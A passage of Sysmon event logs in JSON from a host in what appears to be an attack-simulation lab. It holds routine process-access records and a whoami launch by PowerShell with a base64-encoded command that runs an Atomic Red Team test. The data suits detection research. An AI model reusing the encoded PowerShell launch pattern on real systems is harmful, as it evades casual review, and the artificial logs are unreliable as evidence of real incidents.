ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4917,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4918,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4919,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4920,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4921,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4922,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4923,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.249\r\nSourceProcessGUID: {A837DB8D-0323-5F25-0000-001056960700}\r\nSourceProcessId: 2580\r\nSourceThreadId: 4128\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-0325-5F25-0000-0010BCDA0700}\r\nTargetProcessId: 644\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.249","SourceProcessGUID":"{A837DB8D-0323-5F25-0000-001056960700}","SourceProcessId":"2580","SourceThreadId":"4128","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-0325-5F25-0000-0010BCDA0700}","TargetProcessId":"644","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:37","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:37","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4924,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:37.263\r\nProcessGuid: {A837DB8D-0325-5F25-0000-0010E3DB0700}\r\nProcessId: 1656\r\nImage: C:\\Windows\\System32\\whoami.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: whoami - displays logged on user information\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: whoami.exe\r\nCommandLine: \"C:\\Windows\\system32\\whoami.exe\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0323-5F25-0000-0020A2950700}\r\nLogonId: 0x795A2\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9\r\nParentProcessGuid: {A837DB8D-0324-5F25-0000-00100DC10700}\r\nParentProcessId: 4984\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADIANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:37.263","ProcessGuid":"{A837DB8D-0325-5F25-0000-0010E3DB0700}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0323-5F25-0000-0020A2950700}","LogonId":"0x795a2","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{A837DB8D-0324-5F25-0000-00100DC10700}","ParentProcessId":"4984","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand 